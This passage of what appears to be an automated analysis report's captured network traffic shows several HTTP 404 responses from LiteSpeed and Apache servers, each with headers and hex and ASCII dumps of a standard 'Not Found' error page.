66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:57:17 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:57:20 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:57:22 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:57:42 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:57:45 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:57:47 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:57:50 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:57:55 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:57:58 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:58:01 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:58:03 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not 